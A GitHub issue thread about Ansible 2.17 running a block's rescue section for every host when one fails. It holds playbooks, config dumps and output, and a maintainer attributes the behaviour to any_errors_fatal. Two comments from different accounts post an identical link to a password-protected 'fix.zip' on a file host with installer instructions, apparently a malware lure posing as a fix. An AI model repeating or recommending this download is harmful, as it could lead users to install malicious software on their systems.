### ISSUE TITLE
`rescue` handling of code `block` always called for ALL hosts if one or more fail in 2.17 (worked in 2.16)

### ISSUE THREAD

**Issue by kvvloten** [ansible/ansible#83854]
### Summary

The `rescue` section of `block` is executed for **each** host in ansible-core 2.17 (ansible 10.0.0 - 10.3.0) if one or more hosts fails in the `block`, whereas in earlier versions (including 2.16 - 9.9.0) it was executed for the failing hosts only.

So far I have not been able to find a workaround and as a result this is a showstopper for the upgrade to version 10 !!

### Issue Type

Documentation Report

### Component Name

rescue (block)

### Ansible Version

```console
$ ansible --version

ansible [core 2.17.3]
  config file = /var/lib/ansible-controller/ansible/ansible.cfg
  configured module search path = ['/var/lib/ansible-controller/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /var/lib/ansible-controller/.pyenv/versions/3.12.1/envs/venv_ansible/lib/python3.12/site-packages/ansible
  ansible collection location = /var/lib/ansible-controller/.ansible/collections:/usr/share/ansible/collections
  executable location = /var/lib/ansible-controller/.pyenv/versions/3.12.1/envs/venv_ansible/bin/ansible
  python version = 3.12.1 (main, Jan 10 2024, 20:24:43) [GCC 12.2.0] (/var/lib/ansible-controller/.pyenv/versions/3.12.1/envs/venv_ansible/bin/python3.12)
  jinja version = 3.1.3
  libyaml = True


Last working version was:

ansible [core 2.16.10]
  config file = /var/lib/ansible-controller/ansible/ansible.cfg
  configured module search path = ['/var/lib/ansible-controller/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /var/lib/ansible-controller/.pyenv/versions/3.12.1/envs/venv_ansible/lib/python3.12/site-packages/ansible
  ansible collection location = /var/lib/ansible-controller/.ansible/collections:/usr/share/ansible/collections
  executable location = /var/lib/ansible-controller/.pyenv/versions/3.12.1/envs/venv_ansible/bin/ansible
  python version = 3.12.1 (main, Jan 10 2024, 20:24:43) [GCC 12.2.0] (/var/lib/ansible-controller/.pyenv/versions/3.12.1/envs/venv_ansible/bin/python3.12)
  jinja version = 3.1.3
  libyaml = True
```

### Configuration

```console
# if using a version older than ansible-core 2.12 you should omit the '-t all'
$ ansible-config dump --only-changed -t all

ANY_ERRORS_FATAL(/var/lib/ansible-controller/ansible/ansible.cfg) = True
CACHE_PLUGIN(/var/lib/ansible-controller/ansible/ansible.cfg) = jsonfile
CACHE_PLUGIN_CONNECTION(/var/lib/ansible-controller/ansible/ansible.cfg) = ~/.ansible_facts_cac>
CACHE_PLUGIN_TIMEOUT(/var/lib/ansible-controller/ansible/ansible.cfg) = 7200
COLOR_UNREACHABLE(/var/lib/ansible-controller/ansible/ansible.cfg) = dark gray
CONFIG_FILE() = /var/lib/ansible-controller/ansible/ansible.cfg
DEFAULT_FILTER_PLUGIN_PATH(/var/lib/ansible-controller/ansible/ansible.cfg) = ['/home/kvv/devel>
DEFAULT_FORCE_HANDLERS(/var/lib/ansible-controller/ansible/ansible.cfg) = True
DEFAULT_FORKS(/var/lib/ansible-controller/ansible/ansible.cfg) = 25
DEFAULT_GATHERING(/var/lib/ansible-controller/ansible/ansible.cfg) = smart
DEFAULT_HOST_LIST(/var/lib/ansible-controller/ansible/ansible.cfg) = ['/home/kvv/development/ma>
DEFAULT_INTERNAL_POLL_INTERVAL(/var/lib/ansible-controller/ansible/ansible.cfg) = 0.001
DEFAULT_LOG_PATH(/var/lib/ansible-controller/ansible/ansible.cfg) = /home/kvv/development/manag>
DEFAULT_LOOKUP_PLUGIN_PATH(/var/lib/ansible-controller/ansible/ansible.cfg) = ['/home/kvv/devel>
DEFAULT_NO_TARGET_SYSLOG(/var/lib/ansible-controller/ansible/ansible.cfg) = True
DEFAULT_TIMEOUT(/var/lib/ansible-controller/ansible/ansible.cfg) = 30
INTERPRETER_PYTHON(/var/lib/ansible-controller/ansible/ansible.cfg) = python3
RETRY_FILES_ENABLED(/var/lib/ansible-controller/ansible/ansible.cfg) = False
SHOW_CUSTOM_STATS(/var/lib/ansible-controller/ansible/ansible.cfg) = True
```

### OS / Environment

Debian 12 with python 3.12 virtualenv

### Steps to Reproduce

The role tests if a host answers on port 22 and if so it checks if login works. If both conditions are met `add_hosts` puts it in the group `linux_reachable_hosts`. 

This is useful for client hosts like laptops that are not always reachable, they will be ignored and the rest of the playbook will proceed with the reachable hosts only.

Playbook:
```yaml
---
- hosts: "comp_linux_clients"
  gather_facts: false
  roles:
    - role: "get_reachable_hosts"
      vars:
        os_type: "linux"

- hosts: "linux_reachable_hosts"
  become: true
  ignore_unreachable: true
  roles:
    - role: "update_linux"
```

Tasks/main.yml of role "get_reachable_hosts":
```yaml
- name: "main.yml - test reachability"
  block:
    - name: "main.yml - check linux"
      block:
        - name: "main.yml - check non-existent tunnel_port"
          # tunnel_port is not supported for Linux hosts
          assert:
            that: tunnel_port is not defined
    
        - name: "main.yml - check linux ssh connection available"
          delegate_to: "localhost"
          wait_for:
            host: "{{ inventory_hostname }}"
            search_regex: "OpenSSH"
            port: 22
            state: "started"
            timeout: 3

        - name: "main.yml - check linux login"
          # This will filter out password reachable hosts when no password is specified
          delegate_to: "localhost"
          command: "ssh {{ ansible_ssh_user }}@{{ inventory_hostname }} 'echo'"
          changed_when: false
          async: 2  # timeout on task
          poll: 1  # polling interval
      when: os_type == 'linux'

    - name: "main.yml - set reachable"
      set_fact:
        reachable: true
  rescue:
    - name: "main.yml - set not reachable"
      set_fact:
        reachable: false

    - name: "main.yml - do not stop on failure"
      meta: "clear_host_errors"

    - name: "main.yml - stop running when unrachable"
      meta: "end_host"

- name: "main.yml - process results"
  delegate_to: "localhost"
  block:
    - name: "main.yml - gather results and update group"
      add_host:
        name: "{{ item }}"
        group: "{{ os_type }}_reachable_hosts"
      changed_when: false
      loop: "{{ hostvars | dict2items | json_query('[?value.reachable].key') | intersect(ansible_play_hosts)  }}"

    - name: "main.yml - show reachable hosts"
      run_once: true
      debug:
        msg: "{{ os_type }} hosts: {{ groups['{}_reachable_hosts'.format(os_type)] }}"

```

### Expected Results

ANSIBLE 9.9.0 
Ansible-core 2.16

There ae 5 hosts in the group: `lin-client01 - 05`, of those just one is powered-on and hence reachable: `lin-client02`.

Crucial output is in:

- `TASK [get_reachable_hosts : main.yml - set reachable]`
- `TASK [get_reachable_hosts : main.yml - set not reachable] `

Compare this with "Actual Results" and notice the difference.

```bash
ansible-playbook site_update_linux.yml -l comp_linux_clients

PLAY [comp_linux_clients:comp_devices:comp_devices_backup:comp_linux_servers] ************************************

TASK [get_reachable_hosts : main.yml - check linux ssh connection available] *************************************
ok: [lin-client02 -> localhost]
fatal: [lin-client04 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client04:22"}
fatal: [lin-client01 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client01:22"}
fatal: [lin-client03 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client03:22"}
fatal: [lin-client05 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client05:22"}

TASK [get_reachable_hosts : main.yml - check linux login] ********************************************************
ASYNC OK on lin-client02: jid=j996375381716.1749441
ok: [lin-client02 -> localhost]

TASK [get_reachable_hosts : main.yml - fail on no connection] ****************************************************
skipping: [lin-client02]

TASK [get_reachable_hosts : main.yml - set reachable] ************************************************************
ok: [lin-client02]

TASK [get_reachable_hosts : main.yml - set not reachable] ********************************************************
ok: [lin-client01]
ok: [lin-client03]
ok: [lin-client04]
ok: [lin-client05]

TASK [get_reachable_hosts : main.yml - do not stop on failure] ***************************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - gather results and update group] ******************************************
ok: [lin-client02 -> localhost] => (item=lin-client02)

TASK [get_reachable_hosts : main.yml - show reachable hosts] *****************************************************
ok: [lin-client02 -> localhost] => {
    "msg": "linux hosts: ['lin-client02']"
}

PLAY [linux_reachable_hosts] *************************************************************************************
```

### Actual Results

ANSIBLE 10.3.0
Ansible-core 2.17

```bash 
ansible-playbook site_update_linux.yml -l comp_linux_clients

PLAY [comp_linux_clients:comp_devices:comp_devices_backup:comp_linux_servers] ************************************

TASK [get_reachable_hosts : main.yml - check linux ssh connection available] *************************************
ok: [lin-client02 -> localhost]
fatal: [lin-client03 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client03:22"}
fatal: [lin-client05 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client05:22"}
fatal: [lin-client01 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client01:22"}
fatal: [lin-client04 -> localhost]: FAILED! => {"changed": false, "elapsed": 4, "msg": "Timeout when waiting for search string OpenSSH in lin-client04:22"}

TASK [get_reachable_hosts : main.yml - set not reachable] ********************************************************
ok: [lin-client02]
ok: [lin-client01]
ok: [lin-client03]
ok: [lin-client04]
ok: [lin-client05]

TASK [get_reachable_hosts : main.yml - do not stop on failure] ***************************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

TASK [get_reachable_hosts : main.yml - stop running when unrachable] *********************************************

PLAY [linux_reachable_hosts] *************************************************************************************
skipping: no hosts matched

PLAY RECAP *******************************************************************************************************
lin-client02                       : ok=5    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
lin-client03                    : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=1    ignored=0   
lin-client05                   : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=1    ignored=0   
lin-client04                      : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=1    ignored=0   
lin-client01                     : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=1    ignored=0
```

### Code of Conduct

- [X] I agree to follow the Ansible Code of Conduct

**Comment by ansibot** [comment]
Files identified in the description:

* [`lib/ansible/playbook/block.py`](https://github.com/ansible/ansible/blob/devel/lib/ansible/playbook/block.py)

If these files are incorrect, please update the `component name` section of the description or use the [component](https://github.com/ansible/ansibotmini#commands) bot command.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mkrizek** [comment]
> The rescue section of block is executed for each host in ansible-core 2.17 (ansible 10.0.0 - 10.3.0) if one or more hosts fails in the block, whereas in earlier versions (including 2.16 - 9.9.0) it was executed for the failing hosts only.

While I agree that this is a change in behavior (via https://github.com/ansible/ansible/pull/78680), and it should probably have been mentioned in the porting guide, IMHO I think the current behavior is correct and more predictable, and stems from your configuration:

> ANY_ERRORS_FATAL(/var/lib/ansible-controller/ansible/ansible.cfg) = True

having `any_errors_fatal` set means that when any hosts fails all other hosts are failed automatically and so all of them enter the rescue section.

**Comment by kvvloten** [comment]
That makes sense and indeed I can agree that it is more consistent this way. *Please do update the porting guide*, I always check it for these kinds of things :-) 

Luckily the workaround is really simple: `any_errors_fatal: false` on that `block` will do the trick!

Thanks for the quick support!

**Comment by kvvloten** [comment]
OK, testing with 10.0.3 shows that `any_errors_fatal: false` can do the trick but **only** when set in `ansible.cfg`.

When I leave the global setting in `ansible.cfg` on `true`, I cannot override it locally:

It does **not** work when setting it on the `block` task line: 
```yaml
- name: "main.yml - test reachability"
  any_errors_fatal: false
  block:
    <redacted>
    - name: "main.yml - set reachable"
      set_fact:
        reachable: true
  rescue:
    - name: "main.yml - set not reachable"
      set_fact:
        reachable: false
        
  <redacted>      
```

And it does **not** work when setting it on the play level:
```yaml
- hosts: "comp_linux_clients"
  gather_facts: false
  any_errors_fatal: false
  roles:
    - role: "get_reachable_hosts"
      vars:
        os_type: "linux"
```

Is it expected behavior that the global setting (`ansible.cfg`) overrides the local setting (the play or the task)?

**Comment by mkrizek** [comment]
> Is it expected behavior that the global setting (ansible.cfg) overrides the local setting (the play or the task)?

No and the following two plays show that setting `any_errors_fatal` on the play/task level overrides the setting from the configuration file:

```
% cat ansible.cfg 
[defaults]
any_errors_fatal=true
```

```yaml
- hosts: h1,h2
  gather_facts: false
  any_errors_fatal: false
  tasks:
    - block:
      - fail:
        when: inventory_hostname == "h1"

      - debug:
          msg: any_errors_fatal is set to false
```

```yaml
- hosts: h1,h2
  gather_facts: false
  tasks:
    - block:
      - fail:
        when: inventory_hostname == "h1"

      - debug:
          msg: any_errors_fatal is set to false
      any_errors_fatal: false
```

```
PLAY [h1,h2] ********************************************************************************************************************

TASK [fail] ********************************************************************************************************************
fatal: [h1]: FAILED! => {"changed": false, "msg": "Failed as requested from task"}
skipping: [h2]

TASK [debug] ********************************************************************************************************************
ok: [h2] => {
    "msg": "any_errors_fatal is set to false"
}

PLAY RECAP ********************************************************************************************************************
h1                         : ok=0    changed=0    unreachable=0    failed=1    skipped=0    rescued=0    ignored=0   
h2                         : ok=1    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0
```
